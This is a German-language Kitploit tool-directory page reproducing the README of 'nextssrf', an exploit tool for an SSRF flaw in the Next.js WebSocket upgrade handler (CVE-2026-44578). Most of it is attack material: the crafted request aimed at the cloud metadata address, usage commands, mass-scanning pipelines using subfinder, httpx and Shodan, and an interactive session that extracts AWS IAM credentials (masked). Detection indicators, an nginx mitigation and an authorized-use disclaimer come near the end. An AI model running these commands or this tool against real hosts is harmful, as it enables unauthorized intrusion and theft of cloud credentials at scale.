Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
nextssrf — CVE-2026-44578 Scanner und Exploit-Tool für SSRF im Next.js WebSocket-Upgrade-Handler. Erkennt anfällige Versionen, extrahiert Cloud-Metadaten und exfiltriert IAM-Anmeldedaten über eine interaktive Shell. | Kitploit
Tools/GitHubGitHub/ynsmroztas/nextssrf
AufklärungSchwachstellenscannerExploitationWebanwendungs-ExploitationInformationsbeschaffungCloud-Sicherheit
GitHubynsmroztas/nextssrf

nextssrf

CVE-2026-44578 Scanner und Exploit-Tool für SSRF im Next.js WebSocket-Upgrade-Handler. Erkennt anfällige Versionen, extrahiert Cloud-Metadaten und exfiltriert IAM-Anmeldedaten über eine interaktive Shell.

Repository anzeigen
76204vor 3 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║         NextSSRF — CVE-2026-44578 Scanner & Exploit          ║
║   Next.js WebSocket Upgrade Handler SSRF                     ║
║   Affected: 13.4.13 → 15.5.15, 16.0.0 → 16.2.4              ║
║         @mitsec / ynsmroztas — Bug Bounty Tooling            ║
╚══════════════════════════════════════════════════════════════╝

Python CVE CVSS License Platform

CVE-2026-44578 — Server-Side Request Forgery über den Next.js WebSocket Upgrade Handler

Übersicht · Installation · Verwendung · Pipeline · Shodan · Interaktiv · Haftungsausschluss


Übersicht

Am 11. Mai 2026 hat Vercel CVE-2026-44578 (CVSS 8.6) gepatcht: eine nicht authentifizierte SSRF im WebSocket-Upgrade-Handler von Next.js, die alle selbst gehosteten Bereitstellungen ab 13.4.13 betrifft.

Mechanismus

root@kitploit:~
GET http://169.254.169.254/latest/meta-data/ HTTP/1.1   ← absolute-form URI
Host: vulnerable-nextjs.com
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==

Das // in http:// löst normalizeRepeatedSlashes aus, setzt statusCode: 308 und finished: true. Der anfällige Upgrade-Handler ignoriert beide Flags und ruft proxyRequest auf, wenn parsedUrl.protocol truthy ist – und leitet die Anfrage an den vom Angreifer kontrollierten Host auf Port 80 weiter.

root@kitploit:~
// router-server.ts (vulnerable)
- if (parsedUrl.protocol) {
-     return await proxyRequest(req, socket, parsedUrl, head)
+ if (finished && parsedUrl.protocol) {
+     if (!statusCode) {
+         return await proxyRequest(req, socket, parsedUrl, head)

Betroffene Versionen

ProduktAnfälligBehoben
Next.js13.4.13 – 15.5.1515.5.16
Next.js16.0.0 – 16.2.416.2.5
Vercel-gehostet✅ NICHT betroffenN/A

Einschränkungen

  • Nur GET (kein POST/PUT)
  • Nur Port 80 (explizite Ports werden durch URL-Normalisierung entfernt)
  • AWS IMDSv2 nicht ausnutzbar (erfordert PUT-Token)
  • GCP-Metadaten lehnen Upgrade: websocket mit 400 ab
  • Reverse-Proxies (nginx/caddy/HAProxy) blockieren absolute-form URIs

Demo

NextSSRF — AWS-Zugangsdaten exfiltriert

AWS IMDSv1-Zugangsdaten via CVE-2026-44578 exfiltriert – interaktive Exploit-Shell


Installation

root@kitploit:~
git clone https://github.com/ynsmroztas/nextssrf
cd nextssrf
python3 nextssrf.py -t https://target.com

Null Abhängigkeiten — nur Python-Standardbibliothek. Python 3.10+ erforderlich.


Verwendung

Einzelziel-Scan

root@kitploit:~
python3 nextssrf.py -t https://target.com

Cloud-spezifisches Targeting

root@kitploit:~
# Nur AWS-Metadaten
python3 nextssrf.py -t https://target.com --cloud aws

# Benutzerdefiniertes internes Ziel
python3 nextssrf.py -t https://target.com \
  --ssrf-host http://internal-api --path /admin

# Tiefenscan (+ interne Dienste)
python3 nextssrf.py -t https://target.com --cloud aws --deep

Massenscan (Pipeline)

root@kitploit:~
# subfinder + httpx + nextssrf
subfinder -d target.com | httpx -silent | \
  python3 nextssrf.py --pipe --threads 20 --cloud aws -o results.jsonl

# Dateieingabe
python3 nextssrf.py -f targets.txt --threads 15 -o results.json

# Erzwungener Scan (auch bei unbekannter Version)
python3 nextssrf.py -t https://target.com --force

Exit-Codes

CodeBedeutung
0Nicht verwundbar / sauber
1Verwundbar (kein Exploit)
2SSRF bestätigt

Interaktive Shell

Erweiterte Exploit-Shell mit automatischer Cloud-Erkennung und IAM-Zugangsdaten-Extraktion:

root@kitploit:~
python3 nextssrf.py -t https://target.com
root@kitploit:~
╔══════════════════════════════════════════════════╗
║  NextSSRF v2 — Interactive Exploit Shell         ║
║  Target : ec2-x-x-x-x.compute.amazonaws.com     ║
║  CVE    : CVE-2026-44578  |  Status: Connected   ║
╚══════════════════════════════════════════════════╝

nextssrf(ec2-x...)> cloud
  [>] Detecting cloud provider...
  ✓ AWS — matched: ['ami-id', 'instance-id', 'iam/', 'hostname']
  → Run 'aws' for full credential extraction

nextssrf(ec2-x...)> aws
  [1/3] Instance Information
  [200] Hostname    : ip-172-31-47-134.ec2.internal
  [200] AZ          : us-east-1d
  [200] Account ID  : {"AccountId": "370741706736"}

  [2/3] IAM Role Discovery
  ✓ IAM Role found: my-ec2-role

  [3/3] Credential Extraction
  ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
  🎯 AWS CREDENTIALS EXFILTRATED!
  ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
  AccessKeyId : ASIAXXXXXXXXXXXXXXXXXX
  SecretKey   : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
  Expiration  : 2026-05-14T22:32:22Z

Shell-Befehle

Automatik-Modus

root@kitploit:~
# Cloud erkennen + vollständige Exploit-Kette automatisch ausführen
python3 nextssrf.py -t https://target.com --auto

Pipeline-Beispiele

root@kitploit:~
# Vollständige Recon → Exploit-Pipeline
subfinder -d target.com \
  | httpx -silent -server \
  | grep -i "next" \
  | python3 nextssrf.py --pipe --cloud aws --deep -o findings.jsonl

# Shodan-Massenscan → interaktiv auf bestätigten Hosts
python3 shodan_nextjs.py --key KEY --org "TargetCorp" \
  | python3 nextssrf.py --pipe --cloud aws -o hits.jsonl

# Bestimmten Versionsbereich prüfen
cat hosts.txt \
  | python3 nextssrf.py --pipe --force --cloud aws \
  | jq '.[] | select(.ssrf_hits | length > 0)'

Erkennung (Blue Team)

Anzeichen für Ausnutzung in Logs:

root@kitploit:~
# Next.js-Prozesslogs
Failed to proxy http:/   ← einzelner Schrägstrich = Normalisierungs-Fingerabdruck

# Zugriffslogs (absolute-form URI + Upgrade-Header)
GET http://169.254.169.254/... HTTP/1.1
Connection: Upgrade
Upgrade: websocket

Gegenmaßnahmen (falls Patch nicht möglich)

root@kitploit:~
# Nginx: absolute-form Request-URIs ablehnen
if ($request_uri ~* "^https?://") {
    return 400;
}

Referenzen

  • GHSA-c4j6-fc7j-m34r
  • NVD CVE-2026-44578
  • Next.js Sicherheitsrelease Mai 2026
  • Hadrian Technische Analyse

Haftungsausschluss

Nur für autorisierte Sicherheitstests und Bug-Bounty-Forschung. Verwenden Sie dies nur gegen Systeme, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Erlaubnis zum Testen haben. Die Autoren haften nicht für Missbrauch oder unbefugte Nutzung. Befolgen Sie stets die Teilnahmebedingungen Ihres Bug-Bounty-Programms.


Mit ❤️ gemacht von @mitsec · ynsmroztas.github.io

Top-Hacker @ Intigriti · 100+ HOF · 2430+ Schwachstellen · 1100+ P1 Kritisch

Tool herunterladen
BefehlBeschreibung
cloudCloud automatisch erkennen (AWS/Azure/GCP/DO/OCI)
awsVollständige AWS IAM-Zugangsdatenkette
azureAzure Managed Identity Token
scanCloud erkennen + automatisch ausnutzen
url <http://>Benutzerdefinierte SSRF-Anfrage
get <N>AWS IMDS-Ziel nach Index
listAlle IMDS-Endpunkte anzeigen
historyAnfrageverlauf
saveSitzung als JSON exportieren
quitBeenden